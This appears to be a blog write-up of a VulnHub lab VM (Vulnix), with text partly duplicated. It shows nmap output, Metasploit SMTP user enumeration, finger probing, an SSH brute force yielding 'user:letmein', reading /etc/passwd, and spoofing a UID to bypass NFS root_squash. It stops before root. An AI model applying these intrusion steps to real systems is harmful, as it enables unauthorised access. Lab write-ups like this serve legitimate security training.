Mission : Get the root flag on `Pipe` which is a deliberately vulnerable virtual machine hosted at https://www.vulnhub.com/. The virtual machine can be downloaded at https://www.vulnhub.com/entry/hacklab-vulnix,48/. I quickly loaded up the virtual machine into my VMWare Player and i was good to go !
Detailed Steps for getting root:
A nmap scan of the box reveals a number of services running on the box such as ssh, smtp, finger, pop3, imap , rlogin , rexec, rshell and nfs.
Our attention is drawn to a number of services which we would typically not see exposed such as finger, rlogin services and nfs.NFS protocol allows a user on a client system to access a folder on the network as if it were present locally. Poorly configured NFS services are known be exploitable.[ If we remember there is a exercise in Metaspoitable that deals excursively on attacking the NFS protocol for getting root]. Hence we go for this service and enumerate if we can mount a share locally.
We see the the /home/vulnix directory can be mounted and we mount it on our attacking box. However we are unable to see the contents of the directory as we keep getting a permission error. We get this error because we are root on our attacking machine and we are trying to access a non root owned directory on the target system. We guess that this is because the NFS /etc/exports file (https://www.centos.org/docs/5/html/Deployment_Guide-en-US/s1-nfs-server-config-exports.html) may have the root_squash permission turned on which squashes the permissions of the root client to the lowest user to prevent unauthorized alteration by a client on the nfs shared directory. In order to view the contents in the mounted directory we need to acess the nfs drive as a user with the same uid and guid as the vulnix user on the target box. Since we dont know the uid and guid of the vulnix user we do some further enumeration on the box.
We see that the smtp service is running of the box. There exisits a metasploit auxilliary module that helps us enumerate all the valid users accounts on the smtp server. We use this module as follows
The module has identified a number of user accounts on the box. The `user` account catches our attention. We guess that accounts maye be reused and use the finger service to determine if its possible to login to this box via the `user` account.
Clearly an account called `user` can be used to login to the box. With no other information available we attempt to bruteforce the ssh service with this user account. After a few minutes we are able to bruteforce successfully ! ! The credentials for this account are user:letmein . Now we can login to the box as `user`.
Once we login we see another user called vulnix. We take note of the uid and giud of this user (2008 in both case). We shall attempt to create a user with the same uid and guid on our client box. Hopefully this will solve out permissions problem and we will be able to elevate our priv to vulnix .
Now on the attacking box we create a testuser with the same uid and guid .
Now after we mount the /home/vulnix directory we no longer see the permission problem !
Detailed Steps for getting root:
A nmap scan of the box reveals a number of services running on the box such as ssh, smtp, finger, pop3, imap , rlogin , rexec, rshell and nfs.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PORT STATE SERVICE VERSION | |
| 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) | |
| | ssh-hostkey: | |
| | 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA) | |
| | 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA) | |
| |_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA) | |
| 25/tcp open smtp Postfix smtpd | |
| |_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | |
| | ssl-cert: Subject: commonName=vulnix | |
| | Issuer: commonName=vulnix | |
| | Public Key type: rsa | |
| | Public Key bits: 2048 | |
| | Not valid before: 2012-09-02T16:40:12+00:00 | |
| | Not valid after: 2022-08-31T16:40:12+00:00 | |
| | MD5: 58e3 f1ac fef6 b6d1 744c 836f ba24 4f0a | |
| |_SHA-1: 712f 69ba 8c54 32e5 711c 898b 55ab 0a83 44a0 420b | |
| |_ssl-date: 2016-01-10T20:23:58+00:00; +8h00m00s from local time. | |
| 79/tcp open finger Linux fingerd | |
| |_finger: No one logged on. | |
| 110/tcp open pop3 Dovecot pop3d | |
| |_pop3-capabilities: TOP CAPA RESP-CODES SASL UIDL STLS PIPELINING | |
| 111/tcp open rpcbind 2-4 (RPC #100000) | |
| | rpcinfo: | |
| | program version port/proto service | |
| | 100000 2,3,4 111/tcp rpcbind | |
| | 100000 2,3,4 111/udp rpcbind | |
| | 100003 2,3,4 2049/tcp nfs | |
| | 100003 2,3,4 2049/udp nfs | |
| | 100005 1,2,3 33679/tcp mountd | |
| | 100005 1,2,3 53650/udp mountd | |
| | 100021 1,3,4 33225/tcp nlockmgr | |
| | 100021 1,3,4 54495/udp nlockmgr | |
| | 100024 1 47591/udp status | |
| | 100024 1 51009/tcp status | |
| | 100227 2,3 2049/tcp nfs_acl | |
| |_ 100227 2,3 2049/udp nfs_acl | |
| 143/tcp open imap Dovecot imapd | |
| |_imap-capabilities: IDLE have ENABLE ID listed LOGIN-REFERRALS post-login more capabilities Pre-login OK LOGINDISABLEDA0001 STARTTLS SASL-IR LITERAL+ IMAP4rev1 | |
| 512/tcp open exec netkit-rsh rexecd | |
| 513/tcp open login? | |
| 514/tcp open shell? | |
| 993/tcp open ssl/imap Dovecot imapd | |
| |_imap-capabilities: IDLE have ENABLE ID LOGIN-REFERRALS post-login more listed capabilities OK Pre-login IMAP4rev1 SASL-IR LITERAL+ AUTH=PLAINA0001 | |
| | ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server | |
| | Issuer: commonName=vulnix/organizationName=Dovecot mail server | |
| | Public Key type: rsa | |
| | Public Key bits: 2048 | |
| | Not valid before: 2012-09-02T16:40:22+00:00 | |
| | Not valid after: 2022-09-02T16:40:22+00:00 | |
| | MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc | |
| |_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e | |
| |_ssl-date: 2016-01-10T20:23:48+00:00; +8h00m01s from local time. | |
| 995/tcp open ssl/pop3 Dovecot pop3d | |
| |_pop3-capabilities: TOP CAPA RESP-CODES USER UIDL SASL(PLAIN) PIPELINING | |
| | ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server | |
| | Issuer: commonName=vulnix/organizationName=Dovecot mail server | |
| | Public Key type: rsa | |
| | Public Key bits: 2048 | |
| | Not valid before: 2012-09-02T16:40:22+00:00 | |
| | Not valid after: 2022-09-02T16:40:22+00:00 | |
| | MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc | |
| |_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e | |
| |_ssl-date: 2016-01-10T20:23:48+00:00; +8h00m01s from local time. | |
| 2049/tcp open nfs 2-4 (RPC #100003) | |
| | rpcinfo: | |
| | program version port/proto service | |
| | 100000 2,3,4 111/tcp rpcbind | |
| | 100000 2,3,4 111/udp rpcbind | |
| | 100003 2,3,4 2049/tcp nfs | |
| | 100003 2,3,4 2049/udp nfs | |
| | 100005 1,2,3 33679/tcp mountd | |
| | 100005 1,2,3 53650/udp mountd | |
| | 100021 1,3,4 33225/tcp nlockmgr | |
| | 100021 1,3,4 54495/udp nlockmgr | |
| | 100024 1 47591/udp status | |
| | 100024 1 51009/tcp status | |
| | 100227 2,3 2049/tcp nfs_acl | |
| |_ 100227 2,3 2049/udp nfs_acl | |
| MAC Address: 00:0C:29:FA:14:AD (VMware) | |
| Device type: general purpose | |
| Running: Linux 2.6.X|3.X | |
| OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 | |
| OS details: Linux 2.6.32 - 3.10 | |
| Uptime guess: 198.841 days (since Thu Jun 25 12:13:22 2015) | |
| Network Distance: 1 hop | |
| TCP Sequence Prediction: Difficulty=262 (Good luck!) | |
| IP ID Sequence Generation: All zeros | |
| Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel |
Our attention is drawn to a number of services which we would typically not see exposed such as finger, rlogin services and nfs.NFS protocol allows a user on a client system to access a folder on the network as if it were present locally. Poorly configured NFS services are known be exploitable.[ If we remember there is a exercise in Metaspoitable that deals excursively on attacking the NFS protocol for getting root]. Hence we go for this service and enumerate if we can mount a share locally.
We see the the /home/vulnix directory can be mounted and we mount it on our attacking box. However we are unable to see the contents of the directory as we keep getting a permission error. We get this error because we are root on our attacking machine and we are trying to access a non root owned directory on the target system. We guess that this is because the NFS /etc/exports file (https://www.centos.org/docs/5/html/Deployment_Guide-en-US/s1-nfs-server-config-exports.html) may have the root_squash permission turned on which squashes the permissions of the root client to the lowest user to prevent unauthorized alteration by a client on the nfs shared directory. In order to view the contents in the mounted directory we need to acess the nfs drive as a user with the same uid and guid as the vulnix user on the target box. Since we dont know the uid and guid of the vulnix user we do some further enumeration on the box.
We see that the smtp service is running of the box. There exisits a metasploit auxilliary module that helps us enumerate all the valid users accounts on the smtp server. We use this module as follows
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| msf auxiliary(smtp_enum) > info | |
| Name: SMTP User Enumeration Utility | |
| Module: auxiliary/scanner/smtp/smtp_enum | |
| License: Metasploit Framework License (BSD) | |
| Rank: Normal | |
| Provided by: | |
| ==[ Alligator Security Team ]== | |
| Heyder Andrade <heyder@alligatorteam.org> | |
| nebulus | |
| Basic options: | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| RHOSTS yes The target address range or CIDR identifier | |
| RPORT 25 yes The target port | |
| THREADS 1 yes The number of concurrent threads | |
| UNIXONLY true yes Skip Microsoft bannered servers when testing unix users | |
| USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt yes The file that contains a list of probable users accounts. | |
| Description: | |
| The SMTP service has two internal commands that allow the | |
| enumeration of users: VRFY (confirming the names of valid users) and | |
| EXPN (which reveals the actual address of users aliases and lists of | |
| e-mail (mailing lists)). Through the implementation of these SMTP | |
| commands can reveal a list of valid users. | |
| References: | |
| http://www.ietf.org/rfc/rfc2821.txt | |
| http://www.osvdb.org/12551 | |
| http://cvedetails.com/cve/1999-0531/ | |
| msf auxiliary(smtp_enum) > set RHOSTS 192.168.116.129 | |
| RHOSTS => 192.168.116.129 | |
| msf auxiliary(smtp_enum) > run | |
| [*] 192.168.116.129:25 Banner: 220 vulnix ESMTP Postfix (Ubuntu) | |
| [+] 192.168.116.129:25 Users found: , backup, bin, daemon, games, gnats, irc, libuuid, list, lp, mail, man, messagebus, news, nobody, postmaster, proxy, sshd, sync, sys, syslog, user, uucp, www-data | |
| [*] Scanned 1 of 1 hosts (100% complete) | |
| [*] Auxiliary module execution completed | |
| msf auxiliary(smtp_enum) > |
The module has identified a number of user accounts on the box. The `user` account catches our attention. We guess that accounts maye be reused and use the finger service to determine if its possible to login to this box via the `user` account.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| finger user@192.168.116.129 | |
| Login: user Name: user | |
| Directory: /home/user Shell: /bin/bash | |
| Last login Sun Jan 10 18:32 (GMT) on pts/1 from 192.168.116.128 | |
| No mail. | |
| No Plan. | |
| Login: dovenull Name: Dovecot login user | |
| Directory: /nonexistent Shell: /bin/false | |
| Never logged in. | |
| No mail. | |
| No Plan. |
Clearly an account called `user` can be used to login to the box. With no other information available we attempt to bruteforce the ssh service with this user account. After a few minutes we are able to bruteforce successfully ! ! The credentials for this account are user:letmein . Now we can login to the box as `user`.
Once we login we see another user called vulnix. We take note of the uid and giud of this user (2008 in both case). We shall attempt to create a user with the same uid and guid on our client box. Hopefully this will solve out permissions problem and we will be able to elevate our priv to vulnix .
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| user@vulnix:~$ cat /etc/passwd | |
| root:x:0:0:root:/root:/bin/bash | |
| ..... | |
| user:x:1000:1000:user,,,:/home/user:/bin/bash | |
| vulnix:x:2008:2008::/home/vulnix:/bin/bash | |
| statd:x:109:65534::/var/lib/nfs:/bin/false | |
| user@vulnix:~$ cat /etc/group | |
| root:x:0: | |
| daemon:x:1: | |
| ..... | |
| lpadmin:x:115: | |
| sambashare:x:116: | |
| vulnix:x:2008: | |
| user@vulnix:~$ |
Now on the attacking box we create a testuser with the same uid and guid .
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id test | |
| uid=2008(test) gid=2008(testers) groups=2008(testers) |
Now after we mount the /home/vulnix directory we no longer see the permission problem !
No comments:
Post a Comment